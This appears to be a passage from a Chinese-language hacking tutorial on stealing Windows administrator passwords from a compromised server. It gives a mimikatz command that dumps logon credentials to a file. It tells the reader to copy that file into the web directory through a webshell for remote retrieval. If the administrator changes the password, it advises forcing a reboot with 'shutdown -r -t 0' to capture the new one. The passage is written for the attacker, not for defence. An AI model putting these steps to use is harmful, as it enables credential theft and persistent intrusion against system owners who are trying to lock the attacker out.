2.读取的密码导出在mimikatz的目录，然后用webshell 将log文件copy到web下，在线访问：

D:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

如果你登录后，管理员发现有人登录，修改了登录密码，

导致你登录不上了，但是使用mimikatz读取的密码还是之前的，

你可以在webshell里重启他的电脑，然后在执行以上步骤....

命令：

shutdown -r -t 0

这样子，在不创建系统账号的情况下也能读取到管理员的密码....